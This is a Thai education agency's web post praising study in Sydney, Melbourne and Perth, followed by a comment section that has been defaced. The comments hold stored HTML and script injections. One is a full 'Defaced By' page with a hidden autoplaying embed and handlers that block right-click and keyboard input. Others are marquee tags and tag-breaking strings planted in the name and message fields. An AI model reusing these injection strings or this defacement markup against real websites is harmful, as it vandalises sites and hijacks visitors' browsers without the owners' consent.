head
FRIENDS INTERNATIONAL EDUCATION CENTER
 รายละเอียดหัวข้อ
ข้อดี ๆ ของการไปเรียนในแต่ละเมือง ที่ออสเตรเลีย
ข้อดีของการไปเรียนที่ซิดนีย์
1. เป็นเมืองแห่งการศึกษา มีหลักสูตรและมหาวิทยาลัยที่มีคุณภาพให้เลือกมากมาย
2. เป็นเมืองที่มีคุณภาพชีวิตที่ดี อัตราการเกิดอาชญากรรมต่ำ
3. เหมาะสำหรับนักศึกษาที่ต้องการเรียนและทำงานพิเศษไปด้วย เพราะมีงานพิเศษให้ทำหลากหลายทั้งกับคนไทยและชาวต่างชาติ
4. เป็นเมืองที่คนไทยนิยมไปเรียนต่อมากที่สุดในออสเตรเลีย
5. เป็นเมืองแห่งแฟชั่น การศึกษา การท่องเที่ยว มีกิจกรรมให้ทำตลอด
6. เป็นเมือง Multi – cultural มีประชากรหลากหลายเชื้อชาติ ทำให้สามารถเรียนรู้วัฒนธรรมต่างๆ และมีโอกาสได้เพื่อนใหม่ตลอดเวลา
7. ที่พัก และอาหารหาได้ง่าย มีอาหารหลากหลายประเภทจากทั่วทุกมุมโลก
8. สภาพอากาศค่อนข้างดี ไม่ร้อนจัดหรือหนาวจัด
9. มีสถานที่ท่องเที่ยวหลากหลาย ทั้งทางธรรมชาติ ชายทะเล หรือสถานที่ทางประวัติศาสตร์
ข้อดีของการไปเรียนที่เมลเบิร์น
1. สมญานามของเมลเบิร์นคือเมืองแห่งการศึกษา สวนสาธารณะและศิลปะ มีการจัดระบบการเรียนการสอนที่เปิดโอกาสให้กับนักเรียนนานาชาติ สถาบันการศึกษาของออสเตรเลียทั้งของรัฐและเอกชน จะแบ่งการศึกษาตั้งแต่ชั้นปฐมวัย ประถมศึกษา มัธยมศึกษา และอุดมศึกษา ในระดับมหาวิทยาลัยจะมีการเปิดสอนในสาขาแขนงต่างๆ มากมาย
2. การเดินทางไปที่นี่ก็จะใช้เวลาบินประมาณ 8 ชั่วโมงครึ่ง ซึ่งถือว่าไม่ใกล้หรือไกลเกินไปและเวลาเร็วกว่าประเทศไทย 3 ชั่วโมง
3. บรรยากาศของ Melbourne จะสงบกว่า ไม่วุ่นวายเหมือน Sydney แต่เป็นนครแห่งความหลากหลายทางด้าน วัฒนธรรม และผู้คนที่มีอัธยาศัยดี เป็นเมืองที่ปลอดภัย อากาศค่อนข้างเย็น อาคารบ้านเรือนในเมืองนี้สวยงาม มีลักษณะคล้ายทางยุโรปเช่น ประเทศฝรั่งเศส
4. เมลเบิร์น เป็นเมืองที่สะอาดและเป็นระเบียบคล้ายๆ กับ Christchurch ของนิวซีแลนด์ ต่างกันก็ตรงที่เมลเบิร์นมีประชากรมากกว่า เพราะแค่เมืองนี้เมืองเดียวก็มีประชากรเท่ากับประเทศนิวซีแลนด์ทั้งประเทศ และที่แตกต่างกันอีกก็คือที่เมลเบิร์นมีความทันสมัยไม่แพ้เมืองใหญ่ๆ ของโลก ทั้งตึกสูง สถานบันเทิง การคมนาคม ที่สะดวก เช่น ภายในตัวเมืองเขาจะมีรถ Melbourne Tram หรือรถรางไฟฟ้าแล่นตามถนนหลักๆ การใช้รถไฟฟ้าในการขนส่งผู้โดยสารในเมืองก็เป็นการลดมลพิษทางอากาศลงได้มาก
5. เป็นเมืองหนึ่งของโลกที่มีการผสมผสานและกลมกลืนทางวัฒนธรรมของคนชาติต่าง ๆ เป็นอย่างดี ก่อให้เกิดวัฒนธรรมของการอยู่ร่วมกันของคนต่างวัฒนธรรม และเป็นที่มาของร้านอาหารนานาชาติมากมาย กว่า 2,300 แห่ง เป็นเมืองที่เพียบพร้อมอุดมสมบูรณ์ด้านอาหารการกิน มีภัตตาคาร ร้านอาหารประเภทต่าง ๆ ทั้งแบบหรูหรา ร้านอาหารขนาดเล็ก หรือ Cafeให้เลือกมากมาย
6. ตัวเมืองมีระบบการขนส่งมวลชนที่มีประสิทธิภาพสูง ทั้งรถราง รถไฟ และรถโดยสายประจำทาง รวมเป็นระบบขนส่งมวลชนเครือข่ายที่ครอบคลุมการให้บริการเชื่อมต่อกันในตัวเมืองและชานเมือง
7. เป็นเมืองที่มีความเจริญเติบโตสูง จึงมีงานพิเศษให้เลือกทำมากมาย และรายได้ดี
8. มีสถานที่ท่องเที่ยวที่น่าสนใจ รวมถึงกิจกรรมให้ทำเป็นประสบการณ์ชีวิตมากมาย
9. เป็นเมืองที่ติดอันดับเมืองที่น่าอยู่ที่สุด มีความปลอดภัยสูง ประชากรมีคุณภาพชีวิตที่ดี
ข้อดีของการไปเรียนเพิร์ท
1. เป็นเมืองขนาดกลางมีที่น่าอยู่และมีมาตรฐานการครองชีพที่ดีที่สุดในโลก เป็นเมืองที่มีค่าครองชีพต่ำเป็นอันดับที่ 3 ของโลก
2. เป็นเมืองที่ใกล้เมืองไทยที่สุดเมื่อเทียบกับเมืองใหญ่ เมืองอื่น ใช้เวลาการเดินทางเพียง 6 ชั่วโมง ทำให้ประหยัดค่าใช้จ่ายในการเดินทาง และมีเวลาใกล้เคียงกับประเทศไทยเพราะเร็วกว่าเพียง 1 ชั่วโมง
3. เป็นเมืองแห่งการศึกษา มีคนไทยน้อย เหมาะในการศึกษาภาษาอังกฤษเป็นอย่างมาก
4. สถาบันการศึกษาในเมืองเพิร์ท เป็นสถาบันชั้นนำระดับโลกและมีชื่อเสียงไปทั่วโลก นักศึกษาที่จบหลักสูตรการศึกษาจากเพิร์ท สามารถมั่นใจได้ว่าคุณวุฒิทางการศึกษาจะเป็นที่ยอมรับในระดับนานาชาติเมื่อต้องหางานทำหรือศึกษาต่อ
5. เป็นเมืองที่มีจำนวนชั่วโมงแสงแดดส่องสว่างมากกว่าเมืองหลวงแห่งอื่นๆ ในออสเตรเลีย
ทำให้มีลักษณะอากาศคล้ายกับประเทศไทย มีฤดูร้อนที่อบอุ่นและไม่มีฝน และมีฤดูหนาวที่ไม่หนาวจัดคุณจะสามารถสนุกสนานกับกิจกรรมกลางแจ้งได้ตลอดทั้งปี
6. เป็นแหล่งรวมของวัฒนธรรมอันหลากหลายซึ่งอยู่ร่วมกันได้อย่างสอดคล้องและปรองดอง
มีผู้คนมากกว่า 200 สัญชาติพำนักอาศัย ทำงาน และศึกษาอยู่ในสังคมรุ่นใหม่ที่มีความก้าวหน้าแห่งนี้ และสะท้อนให้เห็นได้จากอาหารที่มีให้คุณเลือกมากมายหลายประเภท เพียงเดินไปตามถนนสักสายในแถบนอร์ธบริดจ์ คุณก็จะได้สัมผัสกับความหลากหลายของวัฒนธรรมที่ผสมผสานกันอยู่ในอาหารจานเดียว ผักสดๆ อาหารทะเลที่น่าลิ้มลอง และอาหารพื้นเมืองจานเด็ด จะช่วยเพิ่มประสบการณ์การรับประทานอาหาร อันน่าประทับใจในเมือง Perth ให้กับคุณ
7. เป็นหนึ่งในเมืองการศึกษาที่ใช้งบค่าใช้จ่ายน้อยที่สุดในบรรดาประเทศที่ใช้ภาษาอังกฤษเป็นภาษาพูด ทั้งการเรียนการสอนที่นี่ก็สามารถเทียบชั้นได้กับแหล่งการศึกษาที่ดีที่สุดของโลก นอกจากนี้ Perth ยังมีมาตรฐานการครองชีพสูง แต่มีค่าครองชีพต่ำ เมื่อเปรียบเทียบกับเมืองใหญ่อื่นๆ ในออสเตรเลียและในต่างประเทศ เช่นราคาที่พักอาศัยจะถูกกว่า ใน Sydney ประมาณ30%
8. ระบบขนส่งมวลชนภายในเมือง Perth มีราคาถูกและทันสมัย ประกอบด้วยเครือข่ายเส้นทางเดิน
เรือเฟอร์รี่ รถโดยสารประจำทาง และรถไฟ ซึ่งให้บริการที่ปลอดภัยในราคาที่ไม่แพง ทั้งคุณยังสามารถเดินทางในใจกลางย่านธุรกิจหรือ CBD ด้วยระบบขนส่งมวลชนทุกชนิดโดยไม่ต้องเสียค่าใช้จ่ายใดๆ เลย
9. การทำงานพิเศษแบบพาร์ทไทม์จะช่วยให้คุณมีเงินไว้ใช้จ่ายเพิ่มมากขึ้น ทั้งยังช่วยให้คุณรู้สึก
เสมือนเป็นส่วนหนึ่งของชุมชนได้อย่างแท้จริง เวสเทิร์นออสเตรเลียเป็นศูนย์กลางเศรษฐกิจของ
ประเทศออสเตรเลีย และมีอัตราการว่างงานต่ำที่สุดในออสเตรเลีย นั่นย่อมหมายความว่ามีงานพิเศษแบบพาร์ทไทม์จำนวนมากในเพิร์ธ สำหรับนักศึกษาต่างชาติ ซึ่งมีสิทธิในการทำงานได้สูงสุด
20 ชั่วโมงต่อสัปดาห์ (และสูงสุด 40 ชั่วโมงต่อสัปดาห์ในระหว่างช่วงปิดภาคการศึกษา)
10. ประสบการณืที่หลากหลายเมื่อถึงคราวที่คุณต้องจากเมือง Perth ไป คุณจะกลับไปพร้อมกับคุณวุฒิทางการศึกษาระดับโลกแต่อย่าพลาดที่จะหาความสนุกสนานในระหว่างที่คุณยังพอจะทำได้ ผู้คนที่ให้การต้อนรับอย่างเป็นมิตร อาหารเลิศรส อากาศที่ดีเยี่ยม และชายหาดที่สวยที่สุดในโลกหลาแห่ง ความบันเทิงยามค่ำคืน กิจกรรมและกีฬาทางน้ำที่ครบครัน ตลอดจนสภาพแวดล้อมที่ส่งเสริมการเรียนรู้
โดย : FRIENDS-INTER เมื่อวันที่ 04/07/2011 เวลา 15:19:08


  ความคิดเห็นที่ [ 1 ]
<html>
<head>

<body background="White">
</font></p></style>
</head><body alink="yellow" bgcolor="black">

<title>Magelang6etar | Newbie-Security</title>
<link rel="shortcut icon" href="http://cdn.kaskus.com/themes_2.0/img/layout/fjb-fjb.png">
<embed src="http://youtube.googleapis.com/v/MOHstTAdw-g&hl=en_US&loop=1&feature=related&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<body onLoad="animate()">

</head><body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" style="cursor: crosshair;
</script>
<font face="Nadall" font color="gray"><b>Defaced?By || Magelang6etar</b>
<style type="text/css">
<!--
.ahgcrewstyle {
color: #F00;
}
.ahg {
color: #0F0;
}
#message font strong {
font-family: Tahoma, Geneva, sans-serif;
font-size: 18px;
}
.gre {
color: #9F3;
font-size: 32px;
}
#message font {
font-size: 18px;
}
-->
</style>
</head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="gray">
<p></p><center>
<center></center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined" || (typeof element.innerHTML == "undefined") {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "";
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "" this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined" {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "" this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "";
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<center>
<font>
</font><p id="message"><font> <strong>
<br>
<img src="http://i.imgur.com/80KjaPN.png" >
<br><font face="Nowadays"; color="#57595e"; size="6">Kapan Aku Bisa Seperti Mu </font>
<br>
<font face="Optimer"; color="#0042ff"; size="6">Newbie-Security!<br>Contact : situmaho@gmail.com</font><br>
<img src="http://forum.detik.com/images/smilies/devilish.png" >
<!-- HTML codes by Quackit.com -->

<script type="text/javascript">
new TypingText(document.getElementById("message", 50, function(i){ var ar = new Array("\\", "", "/", "-"; return " " + ar[i.length % ar.length]; });
//Type out examples:
TypingText.runAll();
</script>
</font></p>
</center></center>
<br>

โดย : Magelang6etar | Newbie-Securit เมื่อวันที่ 06/10/2013 เวลา 00:08:29 


  ความคิดเห็นที่ [ 2 ]
<marquee><font color=Blue size=32>DevilScreaM</font></marquee>
โดย : ddddddd เมื่อวันที่ 08/10/2013 เวลา 21:11:17 


  ความคิดเห็นที่ [ 3 ]

Qform.php
โดย : Qform.php เมื่อวันที่ 09/10/2013 เวลา 08:15:25 


  ความคิดเห็นที่ [ 4 ]

&#1575;&#1604;&#1581;&#1610;&#1576;&#1610;
โดย : Qform.php เมื่อวันที่ 09/10/2013 เวลา 08:19:13 


  ความคิดเห็นที่ [ 5 ]

โดย : <marquee><font color=Blue size เมื่อวันที่ 31/03/2014 เวลา 03:44:34 


  ความคิดเห็นที่ [ 6 ]
<marquee><font color=Blue size=32>lol</font></marquee>
โดย : fdad เมื่อวันที่ 31/03/2014 เวลา 03:46:00 


  ความคิดเห็นที่ [ 7 ]
><marquee><h1>Lawlz</h1></marquee> <!--
โดย : lulz เมื่อวันที่ 31/03/2014 เวลา 04:00:09 


  ความคิดเห็นที่ [ 8 ]
adfqa

โดย : <marquee><font color=Blue size เมื่อวันที่ 31/03/2014 เวลา 05:26:44 


  ความคิดเห็นที่ [ 9 ]
idfia
โดย : "><h1>lulz</h1><!-- เมื่อวันที่ 31/03/2014 เวลา 05:43:23 

 แสดงความคิดเห็น

 


   
 
     
รูปภาพ แสดงผลใน Browser : Internet Exeplorer 5.5+
  ชื่อ **
  อีเมล
  ใส่รหัสโค๊ด => 43158
     
   

 
  10 กระทู้ล่าสุด ตั้งกระทู้ใหม่ ดูทั้งหมด
 
   Untitled Document

FRIENDS INTERNATIONAL EDUCATION CENTER
ศูนย์แนะแนวศึกษาต่อประเทศออสเตรเลีย
ที่อยู่ 60/5 ถ.หนองบัว หมู่ 12 ต.รอบเวียง อ.เมือง จ.เชียงราย โทร 053-716689 , 081-9801418

  CopyRight 2009-2010 http://www.friends-inter.com All Right Reserved. Power by : Chiangrai Enter Soft